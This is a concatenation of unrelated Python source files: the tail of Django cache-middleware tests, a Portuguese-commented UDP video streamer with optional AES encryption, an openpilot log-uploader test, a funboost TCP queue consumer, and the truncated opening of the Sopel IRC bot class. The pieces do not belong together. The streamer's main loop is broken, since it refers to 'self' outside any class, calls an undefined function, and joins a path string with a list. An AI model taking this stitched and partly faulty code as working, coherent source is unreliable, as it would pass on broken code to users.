)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = timezone.get_current_timezone_name()
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = timezone.get_current_timezone_name()
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Timezone-dependent cache keys should use ASCII characters only
# (#17476). The implementation here is a bit odd (timezone.utc is an
# instance, not a class), but it simulates the correct conditions.
class CustomTzName(timezone.utc):
pass
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName):
CustomTzName.zone = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(
sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active"
)
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(
sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active"
)
@ignore_warnings(category=RemovedInDjango21Warning) # USE_ETAGS=True
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# The cache can be recovered
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# ETags are used.
self.assertTrue(get_cache_data.has_header('ETag'))
# ETags can be disabled.
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
def setUp(self):
super().setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super().tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
def test_304_response_has_http_caching_headers_but_not_cached(self):
original_view = mock.Mock(return_value=HttpResponseNotModified())
view = cache_page(2)(original_view)
request = self.factory.get('/view/')
# The view shouldn't be cached on the second call.
view(request).close()
response = view(request)
response.close()
self.assertEqual(original_view.call_count, 2)
self.assertIsInstance(response, HttpResponseNotModified)
self.assertIn('Cache-Control', response)
self.assertIn('Expires', response)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the ETag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@ignore_warnings(category=RemovedInDjango21Warning)
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key, 'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key, 'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key, 'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
Streamer.py | import socket
import threading
import time
import os
import AES
DNS_IP = '192.168.1.11'
DNS_PORT = 10000
VIEWER_PORT = 9000
CIPHER_MODE = 1
BUFFER_PATH = os.path.join(os.getcwd(),"buffer/")
class Streamer(object):
def __init__(self, name):
# viewer list
self.viewers_list = []
# Viewers server
self.viewSock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
self.viewSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.stream_name = name
# Hide Stream
self.isHide = False
self.key = []
def listen_viewers(self):
listen_addr = ("", VIEWER_PORT)
print listen_addr
self.viewSock.bind(listen_addr)
while True:
data, addr = self.viewSock.recvfrom(1024)
# just viewers with the key can watch this stream
if self.isHide:
data = AES.decryptData(self.key, data, CIPHER_MODE)
if data == "Novo Viewer":
print "Novo Viewer: ", addr
self.viewers_list.append(addr)
#avisa o dns que o streamer esta ativo
def send_dns(self, name):
# DNS client socket
DNSSock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
dns_addr = (DNS_IP, DNS_PORT)
print "Conectou no DNS"
DNSSock.sendto("stream:"+name, dns_addr)
DNSSock.close()
# Create Private Stream
def hide(self, key = []):
if not key:
fkey = open(self.stream_name+".key","w")
else:
fkey = open(self.stream_name+".key","r")
if not key:
key = AES.generateRandomKey(16)
fkey.write(key)
self.key = key
self.isHide = True
def send_video(self, video):
i=1;
for viewer in self.viewers_list:
print 'Transmitindo para: ', viewer,time.ctime()
i+=1
time.sleep(1)
self.viewSock.sendto(video, viewer)
def send(self, data):
if self.isHide:
data = AES.encryptData(self.key, data, CIPHER_MODE)
thread_transmit = threading.Thread(target=self.send_video, args=(data, ))
thread_transmit.start()
def start(self):
print 'Stream online ', self.stream_name
# Diz que esta online para o DNS
self.send_dns(self.stream_name )
# Esperar viewers
thread_listen = threading.Thread(target=self.listen_viewers)
thread_listen.start()
if __name__ == "__main__":
os.system('clear')
minhaStream = Streamer(raw_input("Nome da Stream: "))
opt = raw_input("Private? y/n ")
if opt == 'y':
opt = raw_input("Ja tem uma key? KeyPath / n ")
if opt != 'n':
fk = open(opt,'r')
minhaStream.hide(fk.read())
else:
minhaStream.hide()
minhaStream.start()
# Loop da Stream
while True:
# Pega imagens na pasta e coloca no buffer
self.buffer = []
for each in os.listdir(BUFFER_PATH):
selFile = os.path.join(BUFFER_PATH, each)
if os.path.isfile(selFile) and selFile.endswith('png'):
self.buffer.append(selFile)
self.buffer.sort(key=natural_keys)
# Pra cada imagem no buffer
for i in self.buffer:
img = open("buffer/"+self.buffer, 'r')
# Quebr em chunks
while True:
st = img.readline(1024)
if not st:
break
minhaStream.send(st)
img.close()
# flag final
minhaStream.send('EOQ')
|
test_uploader.py | #!/usr/bin/env python3
import os
import time
import threading
import unittest
import logging
import json
from selfdrive.swaglog import cloudlog
import selfdrive.loggerd.uploader as uploader
from common.xattr import getxattr
from selfdrive.loggerd.tests.loggerd_tests_common import UploaderTestCase
class TestLogHandler(logging.Handler):
def __init__(self):
logging.Handler.__init__(self)
self.reset()
def reset(self):
self.upload_order = list()
self.upload_ignored = list()
def emit(self, record):
try:
j = json.loads(record.getMessage())
if j["event"] == "upload_success":
self.upload_order.append(j["key"])
if j["event"] == "upload_ignored":
self.upload_ignored.append(j["key"])
except Exception:
pass
log_handler = TestLogHandler()
cloudlog.addHandler(log_handler)
class TestUploader(UploaderTestCase):
def setUp(self):
super().setUp()
log_handler.reset()
def start_thread(self):
self.end_event = threading.Event()
self.up_thread = threading.Thread(target=uploader.uploader_fn, args=[self.end_event])
self.up_thread.daemon = True
self.up_thread.start()
def join_thread(self):
self.end_event.set()
self.up_thread.join()
def gen_files(self, lock=False, boot=True):
f_paths = list()
for t in ["qlog.bz2", "rlog.bz2", "dcamera.hevc", "fcamera.hevc"]:
f_paths.append(self.make_file_with_data(self.seg_dir, t, 1, lock=lock))
if boot:
f_paths.append(self.make_file_with_data("boot", f"{self.seg_dir}.bz2", 1, lock=lock))
return f_paths
def gen_order(self, seg1, seg2, boot=True):
keys = []
if boot:
keys += [f"boot/{self.seg_format.format(i)}.bz2" for i in seg1]
keys += [f"boot/{self.seg_format2.format(i)}.bz2" for i in seg2]
keys += [f"{self.seg_format.format(i)}/qlog.bz2" for i in seg1]
keys += [f"{self.seg_format2.format(i)}/qlog.bz2" for i in seg2]
keys += [f"{self.seg_format.format(i)}/rlog.bz2" for i in seg1]
keys += [f"{self.seg_format2.format(i)}/rlog.bz2" for i in seg2]
for i in seg1:
keys += [f"{self.seg_format.format(i)}/{f}" for f in ['fcamera.hevc', 'dcamera.hevc']]
for i in seg2:
keys += [f"{self.seg_format2.format(i)}/{f}" for f in ['fcamera.hevc', 'dcamera.hevc']]
return keys
def test_upload(self):
self.gen_files(lock=False)
self.start_thread()
# allow enough time that files could upload twice if there is a bug in the logic
time.sleep(5)
self.join_thread()
exp_order = self.gen_order([self.seg_num], [])
self.assertTrue(len(log_handler.upload_ignored) == 0, "Some files were ignored")
self.assertFalse(len(log_handler.upload_order) < len(exp_order), "Some files failed to upload")
self.assertFalse(len(log_handler.upload_order) > len(exp_order), "Some files were uploaded twice")
for f_path in exp_order:
self.assertTrue(getxattr(os.path.join(self.root, f_path), uploader.UPLOAD_ATTR_NAME), "All files not uploaded")
self.assertTrue(log_handler.upload_order == exp_order, "Files uploaded in wrong order")
def test_upload_ignored(self):
self.set_ignore()
self.gen_files(lock=False)
self.start_thread()
# allow enough time that files could upload twice if there is a bug in the logic
time.sleep(5)
self.join_thread()
exp_order = self.gen_order([self.seg_num], [])
self.assertTrue(len(log_handler.upload_order) == 0, "Some files were not ignored")
self.assertFalse(len(log_handler.upload_ignored) < len(exp_order), "Some files failed to ignore")
self.assertFalse(len(log_handler.upload_ignored) > len(exp_order), "Some files were ignored twice")
for f_path in exp_order:
self.assertTrue(getxattr(os.path.join(self.root, f_path), uploader.UPLOAD_ATTR_NAME), "All files not ignored")
self.assertTrue(log_handler.upload_ignored == exp_order, "Files ignored in wrong order")
def test_upload_files_in_create_order(self):
seg1_nums = [0, 1, 2, 10, 20]
for i in seg1_nums:
self.seg_dir = self.seg_format.format(i)
self.gen_files(boot=False)
seg2_nums = [5, 50, 51]
for i in seg2_nums:
self.seg_dir = self.seg_format2.format(i)
self.gen_files(boot=False)
exp_order = self.gen_order(seg1_nums, seg2_nums, boot=False)
self.start_thread()
# allow enough time that files could upload twice if there is a bug in the logic
time.sleep(5)
self.join_thread()
self.assertTrue(len(log_handler.upload_ignored) == 0, "Some files were ignored")
self.assertFalse(len(log_handler.upload_order) < len(exp_order), "Some files failed to upload")
self.assertFalse(len(log_handler.upload_order) > len(exp_order), "Some files were uploaded twice")
for f_path in exp_order:
self.assertTrue(getxattr(os.path.join(self.root, f_path), uploader.UPLOAD_ATTR_NAME), "All files not uploaded")
self.assertTrue(log_handler.upload_order == exp_order, "Files uploaded in wrong order")
def test_no_upload_with_lock_file(self):
f_paths = self.gen_files(lock=True, boot=False)
self.start_thread()
# allow enough time that files should have been uploaded if they would be uploaded
time.sleep(5)
self.join_thread()
for f_path in f_paths:
self.assertFalse(getxattr(f_path, uploader.UPLOAD_ATTR_NAME), "File upload when locked")
if __name__ == "__main__":
unittest.main(failfast=True)
|
tcp_consumer.py | # -*- coding: utf-8 -*-
# @Author : ydf
# @Time : 2019/8/8 0008 13:32
import json
from threading import Thread
import socket
from funboost.consumers.base_consumer import AbstractConsumer
class TCPConsumer(AbstractConsumer, ):
"""
socket 实现消息队列,不支持持久化,但不需要安装软件。
"""
BROKER_KIND = 22
BUFSIZE = 10240
# noinspection PyAttributeOutsideInit
def custom_init(self):
ip__port_str = self.queue_name.split(':')
ip_port = (ip__port_str[0], int(ip__port_str[1]))
self._ip_port_raw = ip_port
self._ip_port = ('', ip_port[1])
# ip_port = ('', 9999)
# noinspection DuplicatedCode
def _shedual_task(self):
""" tcp为消息队列中间件 时候 queue_name 要设置为例如 127.0.0.1:5689"""
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # tcp协议
server.bind(self._ip_port)
server.listen(128)
self._server = server
while True:
tcp_cli_sock, addr = self._server.accept()
Thread(target=self.__handle_conn, args=(tcp_cli_sock,)).start() # 服务端多线程,可以同时处理多个tcp长链接客户端发来的消息。
def __handle_conn(self, tcp_cli_sock):
try:
while True:
data = tcp_cli_sock.recv(self.BUFSIZE)
# print('server收到的数据', data)
if not data:
break
self._print_message_get_from_broker(f'udp {self._ip_port_raw}', data.decode())
tcp_cli_sock.send('has_recived'.encode())
# tcp_cli_sock.close()
kw = {'body': json.loads(data)}
self._submit_task(kw)
tcp_cli_sock.close()
except ConnectionResetError:
pass
def _confirm_consume(self, kw):
pass # 没有确认消费的功能。
def _requeue(self, kw):
pass
|
bot.py | # coding=utf-8
# Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
# Copyright 2012-2015, Elsie Powell, http://embolalia.com
#
# Licensed under the Eiffel Forum License 2.
from __future__ import unicode_literals, absolute_import, print_function, division
import collections
import os
import re
import sys
import threading
import time
from sopel import tools
from sopel import irc
from sopel.db import SopelDB
from sopel.tools import stderr, Identifier
import sopel.tools.jobs
from sopel.trigger import Trigger
from sopel.module import NOLIMIT
from sopel.logger import get_logger
import sopel.loader
LOGGER = get_logger(__name__)
if sys.version_info.major >= 3:
unicode = str
basestring = str
py3 = True
else:
py3 = False
class _CapReq(object):
def __init__(self, prefix, module, failure=None, arg=None, success=None):
def nop(bot, cap):
pass
# TODO at some point, reorder those args to be sane
self.prefix = prefix
self.module = module
self.arg = arg
self.failure = failure or nop
self.success = success or nop
class Sopel(irc.Bot):
def __init__(self, config, daemon=False):
irc.Bot.__init__(self, config)
self._daemon = daemon # Used for iPython. TODO something saner here
# `re.compile('.*') is re.compile('.*')` because of caching, so we need
# to associate a list with each regex, since they are unexpectedly
# indistinct.
self._callables = {
'high': collections.defaultdict(list),
'medium': collections.defaultdict(list),
'low': collections.defaultdict(list)
}
self.config = config
"""The :class:`sopel.config.Config` for the current Sopel instance."""
self.doc = {}
"""
A dictionary of command names to their docstring and example, if
declared. The first item in a callable's commands list is used as the
key in version *3.2* onward. Prior to *3.2*, the name of the function
as declared in the source code was used.
"""
self._command_groups = collections.defaultdict(list)
"""A mapping of module names to a list of commands in it."""
self.stats = {} # deprecated, remove in 7.0
self._times = {}
"""
A dictionary mapping lower-case'd nicks to dictionaries which map
funtion names to the time which they were last used by that nick.
"""
self.server_capabilities = {}
"""A dict mapping supported IRCv3 capabilities to their options.
For example, if the server specifies the capability ``sasl=EXTERNAL``,
it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
without any options will have ``None`` as the value.
For servers that do not support IRCv3, this will be an empty set."""
self.enabled_capabilities = set()
"""A set containing the IRCv3 capabilities that the bot has enabled."""
self._cap_reqs = dict()
"""A dictionary of capability names to a list of requests"""
self.privileges = dict()
"""A dictionary of channels to their users and privilege levels
The value associated with each channel is a dictionary of
:class:`sopel.tools.Identifier`\\s to
a bitwise integer value, determined by combining the appropriate
constants from :mod:`sopel.module`.
.. deprecated:: 6.2.0
Use :attr:`channels` instead.
"""
self.channels = tools.SopelMemory() # name to chan obj
"""A map of the channels that Sopel is in.
The keys are Identifiers of the channel names, and map to
:class:`sopel.tools.target.Channel` objects which contain the users in
the channel and their permissions.
"""
self.users = tools.SopelMemory() # name to user obj
"""A map of the users that Sopel is aware of.
The keys are Identifiers of the nicknames, and map to
:class:`sopel.tools.target.User` instances. In order for Sopel to be
aware of a user, it must be in at least one channel which they are also
in.
"""
self.db = SopelDB(config)
"""The bot's database, as a :class:`sopel.db.SopelDB` instance."""
self.memory = tools.SopelMemory()
"""
A thread-safe dict for storage of runtime data to be shared between
modules. See :class:`sopel.tools.Sopel.SopelMemory`
"""
self.shutdown_methods = []
"""List of methods to call on shutdown"""
self.scheduler = sopel.tools.jobs.JobScheduler(self)
self.scheduler.start()
# Set up block lists
# Default to empty
if not self.config.core.nick_blocks:
self.config.core.nick_blocks = []
if not self.config.core.host_blocks:
self.config.core.host_blocks = []
self.setup()
# Backwards-compatibility aliases to attributes made private in 6.2. Remove
# these in 7.0
times = property(lambda self: getattr(self, '_times'))
command_groups = property(lambda self: getattr(self, '_command_groups'))
def write(self, args, text=None): # Shim this in here for autodocs
"""Send a command to the server.
``args`` is an iterable of strings, which are joined by spaces.
``text`` is treated as though it were the final item in ``args``, but
is preceeded by a ``:``. This is a special case which means that
``text``, unlike the items in ``args`` may contain spaces (though this
constraint is not checked by ``write``).
In other words, both ``sopel.write(('PRIVMSG',), 'Hello, world!')``
and ``sopel.write(('PRIVMSG', ':Hello, world!'))`` will send
``PRIVMSG :Hello, world!`` to the server.
Newlines and carriage returns ('\\n' and '\\r') are removed before
sending. Additionally, if the message (after joining) is longer than
than 510 characters, any remaining characters will not be sent.
"""
irc.Bot.write(self, args, text=text)
def setup(self):
stderr("\nWelcome to Sopel. Loading modules...\n\n")
modules = sopel.loader.enumerate_modules(self.config)
error_count = 0
success_count = 0
for name in modules:
path, type_ = modules[name]
try:
module, _ = sopel.loader.load_module(name, path, type_)
except Exception as e:
error_count = error_count + 1
filename, lineno = tools.get_raising_file_and_line()
rel_path = os.path.relpath(filename, os.path.dirname(__file__))
raising_stmt = "%s:%d" % (rel_path, lineno)
stderr("Error loading %s: %s (%s)" % (name, e, raising_stmt))
else:
try:
if hasattr(module, 'setup'):
module.setup(self)
relevant_parts = sopel.loader.clean_module(
module, self.config)
except Exception as e:
error_count = error_count + 1
filename, lineno = tools.get_raising_file_and_line()
rel_path = os.path.relpath(
filename, os.path.dirname(__file__)
)
raising_stmt = "%s:%d" % (rel_path, lineno)
stderr("Error in %s setup procedure: %s (%s)"
% (name, e, raising_stmt))
else:
self.register(*relevant_parts)
success_count += 1
if len(modules) > 1: # coretasks is counted
stderr('\n\nRegistered %d modules,' % (success_count - 1))
stderr('%d modules failed to load\n\n' % error_count)
else:
